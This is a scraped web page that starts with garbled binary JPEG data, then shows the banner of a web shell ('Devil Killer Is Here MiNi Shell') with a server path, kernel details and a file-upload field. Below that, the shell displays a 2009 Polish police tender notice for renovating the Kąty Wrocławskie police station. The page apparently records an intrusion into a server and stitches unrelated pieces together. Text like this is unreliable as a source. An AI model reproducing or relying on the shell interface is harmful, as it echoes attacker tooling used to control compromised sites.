JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091014/359698-N-2009.html

<p class="kh_header"><b>Wrocław: Remont parteru Komisariatu Policji w Kątach Wrocławskich</b><br>
<b>Numer ogłoszenia: 359698 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont parteru Komisariatu Policji w Kątach Wrocławskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest remont parteru budynku Komisariatu Policji w Kątach Wrocławskich przy ul. 1 Maja 16 wraz ze stworzeniem  stanowiska do obsługi petentów, obejmujący następujący zakres robót:
1.1.	- wykonanie robót budowlanych związanych z utworzeniem funkcji recepcyjnej
1.2.	- wymianę stolarki okiennej i drzwiowej zewnętrznej i wewnętrznej
1.3.	- wymianę posadzek
1.4.	- wymianę okładzin z płytek ceramicznych
1.5.	- montaż sufitów podwieszonych 
1.6.	- wykonanie robót przygotowawczych i malarskich
1.7.	- wymianę instalacji elektrycznej i oświetleniowej
1.8.	- wymianę armatury sanitarnej 
1.9.	- wykonanie prac w zakresie instalacji słaboprądowych (instalacja kontroli dostępu, element instalacji okablowania strukturalnego, przełożenie kabla antenowego)
- zgodnie z dokumentacją projektową, przedmiarami robót, wiedzą techniczną, technologią robót oraz specyfikacjami technicznymi wykonania i odbioru robót budowlanych.
2.	Szczegółowy zakres rzeczowy prac budowlanych przedstawiono w dokumentacji projektowej (załącznik nr 3 do SIWZ), przedmiarach robót (załączniki nr 4A, 4B i 4C do SIWZ) oraz w specyfikacjach technicznych wykonania i odbioru robót budowlanych (załączniki nr 5A, 5B i 5C do SIWZ) stanowiących integralną część Specyfikacji Istotnych Warunków Zamówienia nr 070-148/2009/AB.
3.	Zasadnicze warunki wykonania robót budowlanych zamawiający określił w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego - załącznik numer 2 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium.
1.1.	Wadium wnosi się przed upływem terminu do składania ofert.
1.2.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek zamawiającego: NBP Oddział okręgowy Wrocław, numer konta: 68 1010 1674 0000 9713 9120 0000 z adnotacją: Wadium - numer sprawy 070-148/2009/AB.
1.3.	Wadium może być wniesione w jednej lub kilku następujących formach:
1.1.1.	pieniądzu
1.1.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
1.1.3.	gwarancjach bankowych
1.1.4.	gwarancjach ubezpieczeniowych
1.1.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.)
1.4.	 W przypadku wadium wnoszonego w pieniądzu - o zachowaniu terminu wniesienia wadium decyduje data wpływu na konto zamawiającego, a nie data dokonania przelewu. 
1.5.	 Wadium wniesione w postaci innej niż pieniądz musi zawierać klauzulę, iż jest nieodwołalne, bezwarunkowe i będzie wypłacone na każde żądanie Zamawiającego wtedy, gdy zaistnieje jedna z przesłanek określonych w art. 46 ust. 4a lub ust. 5 z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2007 r. Nr 223, poz. 1655, z 2008 r. Nr 171, poz. 1058, Nr 220, poz. 1420, Nr 227, poz. 1505, z 2009 r. Nr 19, poz. 101, Nr 65, poz. 545, Nr 91, poz. 742). 
1.6.	Jeśli wadium wnoszone jest w formie innej niż pieniądz, to oryginał dokumentu (wadium) wykonawca składa w siedzibie zamawiającego w Wydziale Zamówień Publicznych i Funduszy Pomocowych Komendy Wojewódzkiej Policji we Wrocławiu; kontakt tel.: (071) 340 3973 lub 340 3800, 340 3978, a kopię tego dokumentu - poświadczoną za zgodność z oryginałem przez wykonawcę - zaleca się dołączyć do oferty. 
1.7.	Jeśli wadium wnoszone jest w formie pieniężnej, to dokument potwierdzający wniesienie wadium w formie pieniężnej zaleca się dołączyć do oferty w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
1.8.	Wysokość wadium wynosi: 4600,00 zł (cztery tysiące sześćset złotych zero groszy). 
1.9.	Zasady zwrotu wadium.
1.9.1.	Zgodnie z art. 46 ust. 1 ustawy, wadium zostanie zwrócone niezwłocznie jeżeli:
1.9.1.1.	upłynął termin związania ofertą,
1.9.1.2.	zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy,
1.9.1.3.	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia. 
1.9.2.	Zgodnie z art. 46 ust. 2 ustawy, zamawiający zwróci niezwłocznie  wadium na wniosek wykonawcy:
1.9.2.1.	który wycofał ofertę przed upływem terminu składania ofert,
1.9.2.2.	który został wykluczony z postępowania,
1.9.2.3.	którego oferta została odrzucona.
1.10.	Przesłanki zatrzymania wadium. 
1.10.1.	W myśl art. 46 ust 4a ustawy zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym  mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
1.10.2.	Zgodnie z art. 46 ust. 5 ustawy zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta zostanie wybrana:
1.10.2.1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
1.10.2.2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
1.10.2.3.	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:               
1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
1.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, to jest: 
1.2.1.	Wykonali należycie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, co najmniej 2 roboty budowlane (roboty wykonane na podstawie dwóch odrębnych umów) odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (dwie roboty budowlane, z których każda obejmowała łącznie dwie branże: ogólnobudowlaną i elektryczną) i wartość każdej z dwóch wykonanych robót budowlanych nie była mniejsza niż 100000,00 zł brutto (sto tysięcy złotych zero groszy); z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. 
1.2.2.	Dysponują kierownikiem budowy i kierownikami robót posiadającymi odpowiednie kwalifikacje i doświadczenie zawodowe oraz uprawnienia budowlane i branżowe w zakresie kierowania robotami budowlanymi bez ograniczeń (zastrzeżenie: wymagane uprawnienia budowlane odpowiednie dla budynków o kubaturze przekraczającej 1000 m3), w specjalnościach:
1.2.2.1.	konstrukcyjno - budowlanej;
1.2.2.2.	instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
1.2.2.3.	instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
1.2.2.4.	kierownik budowy i kierownicy robót przynależą do właściwej izby samorządu budowlanego (właściwej terytorialnie Okręgowej Izby Inżynierów i Techników Budowlanych lub Okręgowej Izby Architektów) oraz posiadają aktualne zaświadczenie o obowiązkowym ubezpieczeniu od odpowiedzialności cywilnej z tytułu wykonywanego zawodu.
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2007 r. Nr 223, poz. 1655, z 2008 r. Nr 171, poz. 1058, Nr 220, poz. 1420, Nr 227, poz. 1505, z 2009 r. Nr 19, poz. 101, Nr 65, poz. 545, Nr 91, poz. 742).
2.	Ocena spełniania warunków udziału w postępowaniu.
2.1.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oferty oraz dokumentów i oświadczeń załączonych do oferty. 
2.2.	Ocena spełnienia warunków udziału w postępowaniu wymaganych od wykonawców zostanie dokonana według reguły: spełnia - nie spełnia.
2.3.	Złożenie przez wykonawcę nieprawdziwych informacji mających wpływ na wynik prowadzonego postępowania, brak oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków, brak wadium, w tym również na przedłużony okres związania ofertą, lub brak zgody na przedłużenie okresu związania ofertą - skutkować będzie wykluczeniem wykonawcy z udziału w prowadzonym postępowaniu na podstawie art. 24 ust. 2 punkty 2 i 3, z zastrzeżeniem art. 26 ust. 3 ustawy, bądź art. 24 ust. 2 pkt 4 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie ma obowiązek dostarczyć wykonawca ubiegający się o udzielenie zamówienia publicznego
Na podstawie art. 26 ust. 2 i 44  Prawo zamówień publicznych oraz § 1 i 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87 poz. 605, Dz. U. Nr 188, poz. 1155), zwanego dalej rozporządzeniem, w celu potwierdzenia, że wykonawca może ubiegać się o zamówienie publiczne zgodnie z art. 22 ust. 1 ustawy oraz że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy, a także że wykonawca spełnia warunki postawione w specyfikacji istotnych warunków zamówienia, zamawiający pod rygorem wykluczenia wykonawcy na podstawie art. 24 ust. 1 lub 2 ustawy albo odrzucenia oferty na podstawie art. 89 ustawy wymaga złożenia właściwie sporządzonej oferty oraz:
A.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, zamawiający żąda, w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, następujących dokumentów oraz oświadczeń:
A.1.	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.2.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 do pkt 8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.3.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy podmiotów zbiorowych).
A.4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
A.4.1.	W punktach A.1 i A.3 -  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
A.4.1.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
A.4.1.2.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
A.5.	W punkcie A.2 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 punkty 4-8 ustawy.
A.6.	Dokumenty, o których mowa w punkcie A.4 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.7.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunktach A.4. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia punktu A.5 stosuje się odpowiednio.
Uwaga. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
A.8.	Oświadczenie wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu - załącznik nr 6 do SIWZ. 
B.	W celu potwierdzenia opisanego przez zamawiającego (punkt 1.2. w rozdziale 8 SIWZ) warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących oświadczeń wykonawcy i dokumentów:
B.1.	Wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (załącznik nr 7 do SIWZ ).
B.2.	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt B.1., wykonawca wskazał osoby, którymi będzie dysponował.
B.3.	Dokumentów stwierdzających, że osoby wymienione w wykazie, o którym mowa w pkt B.1., a które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane w punkcie 1.2.2 w rozdziale 8 SIWZ uprawnienia budowlane i branżowe w zakresie kierowania robotami budowlanymi w żądanych w tym punkcie specjalnościach.  
B.4.	Aktualnych dokumentów stwierdzających przynależność tych osób do Okręgowej Izby Inżynierów i Techników Budowlanych lub Okręgowej Izby Architektów wraz z aktualnymi zaświadczeniami o obowiązkowym ubezpieczeniu od odpowiedzialności cywilnej z tytułu wykonywanego zawodu. 
B.5.	Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zawierającego co najmniej dwie roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, z zachowaniem warunku określonego punkcie 1.2.1 w rozdziale 8 SIWZ, z podaniem ich wartości oraz daty i miejsca wykonania (załącznik nr 8 do SIWZ).
B.6.	Dla każdej wykonanej roboty budowlanej przedstawionej w wykazie, o którym mowa w pkt B.5., dokumentów (referencji) potwierdzających, że wymienione roboty budowlane zostały wykonane należycie. Oznaczenie dokumentów winno jednoznacznie wskazywać, którego zadania dotyczą. Dokumenty te mogą być przedstawione albo w formie oryginału, albo kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
C.	Pozostałe oświadczenia i dokumenty składane wraz z ofertą: 
C.1.	W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego, zamawiający na podstawie § 3 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87 poz. 605, Dz. U. Nr 188, poz. 1155) żąda następujących oświadczeń i dokumentów: 
C.1.1.	Podpisanego Oświadczenia Wykonawcy potwierdzającego wykonanie zamówienia publicznego na warunkach i zgodnie z wymaganiami określonymi w istotnych dla stron postanowieniach, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego - załącznik nr 2 do SIWZ.
C.1.2.	Podpisanego i odpowiednio wypełnionego kosztorysu ofertowego wraz ze szczegółowym zestawieniem materiałów, sprzętu i robocizny, opracowanego na podstawie: dokumentacji projektowej (załącznik nr 3 do SIWZ) przedmiarów robót stanowiących (załączniki nr 4A, 4B i 4C do SIWZ) oraz specyfikacji technicznych wykonania i odbioru robót budowlanych (załączniki nr 5A, 5B i 5C do SIWZ).
C.2.	Odpowiednio wypełniony i podpisany formularz ofertowy -  załącznik nr 1 do SIWZ.
C.3.	Jeśli wykonawca zamierza powierzyć podwykonawcom wykonanie określonych części zamówienia, to w takim przypadku wykonawca ma obowiązek złożyć wraz z ofertą wypełnione i podpisane Oświadczenie Wykonawcy  w sprawie udziału podwykonawców - załącznik nr 9 do SIWZ.
C.4.	W przypadku wykonawcy będącego spółką cywilną wykonawca ma obowiązek złożyć wraz z ofertą:
C.4.1.	zaświadczenia o wpisie do ewidencji działalności gospodarczej każdego ze wspólników (przedsiębiorców) spółki cywilnej, oraz 
C.4.2.	wymagane dokumenty przetargowe, w szczególności formularz ofertowy i kosztorys ofertowy - podpisane przez wszystkich wspólników (przedsiębiorców) spółki cywilnej, albo 
C.4.3.	wymagane dokumenty przetargowe, w szczególności formularz ofertowy i kosztorys ofertowy - podpisane przez osoby wymienione w pełnomocnictwie oraz pełnomocnictwo do reprezentowania spółki cywilnej złożone w formie pisemnej (oryginał) albo odpis pełnomocnictwa notarialnie poświadczony za zgodność z oryginałem - podpisane przez wszystkich  wspólników (przedsiębiorców) spółki cywilnej, albo 
C.4.4.	wymagane dokumenty przetargowe, w szczególności formularz ofertowy - podpisane przez wspólnika albo przez niektórych wspólników (przedsiębiorców) spółki cywilnej, w zależności od tego, jak reprezentację spółki w przedmiotowym zakresie reguluje umowa spółki; w takim przypadku wykonawca ma obowiązek złożyć wraz z ofertą i dokumentami przetargowymi odpis umowy spółki cywilnej poświadczony notarialnie za zgodność z oryginałem. 
C.5.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcjum):
C.5.1.	W przypadku, o którym mowa w ust. 1 art. 23 Prawa zamówień publicznych, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  W związku z powyższym, niezbędne jest złożenie wraz z ofertą pełnomocnictwa ustanawiającego podmiot uprawniony (pełnomocnika, lidera) do występowania w imieniu grupy wykonawców, które będzie podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców. Pełnomocnictwo winno być złożone w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza.
C.5.2.	Każdy z wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego składa dokumenty wymienione w punkcie A w Rozdziale 9 potwierdzające spełnianie warunków udziału w postępowaniu przez każdego wykonawcę ubiegającego się wspólnie o udzielenie zamówienia. 
C.5.3.	Zamawiający zastrzega, iż nie można dzielić spełnienia warunku udziału w postępowaniu, o którym mowa w punktach 1.2.1 w rozdziale 8 SIWZ, pomiędzy kilku członków konsorcjum. Zamawiający żąda wykazania się doświadczeniem w postaci wykonania (wykonywania) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, co najmniej 2 (dwóch) robót budowlanych (roboty wykonane na podstawie dwóch odrębnych umów) - odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (dwie roboty budowlane, z których każda obejmowała łącznie dwie branże: ogólnobudowlaną i elektryczną) i wartość każdej z dwóch wykonanych robót budowlanych nie była mniejsza niż 100000,00 zł brutto (sto tysięcy złotych zero groszy). Zamawiający uzna, że  konsorcjum spełni ten warunek udziału w postępowaniu, jeżeli wykonaniem (wykonywaniem) tak określonych co najmniej 2 robót budowlanych wykaże się co najmniej jeden konsorcjant. Dla zamawiającego w przedmiotowym postępowaniu nie będzie stanowić spełnienia tego warunku, np. wykazanie się wykonaniem (wykonywaniem) 1 roboty budowlanej przez jednego konsorcjanta oraz wykonanie (wykonywanie) 1 roboty budowlanej przez drugiego członka konsorcjum. W takim wypadku całe konsorcjum podlega wykluczeniu na podstawie art. 24 ust. 2 pkt 3 ustawy.
C.5.4.	Zamawiający w przypadku wybrania oferty złożonej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, zażąda przed zawarciem umowy w sprawie zamówienia publicznego złożenia umowy regulującej współpracę tych wykonawców i określającej wzajemne relacje między tymi wykonawcami. Zgodnie z art. 141 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.dolnoslaska.policja.gov.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji we Wrocławiu 
Adres (siedziba): ul. Podwale 31-33, 50-040 Wrocław
Wydział Zamówień Publicznych i Funduszy Pomocowych
tel. 071) 340 3973; faks (071) 782 4171.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2009 godzina 12:00, miejsce: Komenda Wojewódzka Policji we Wrocławiu 
Adres (siedziba): ul. Podwale 31-33, 50-040 Wrocław
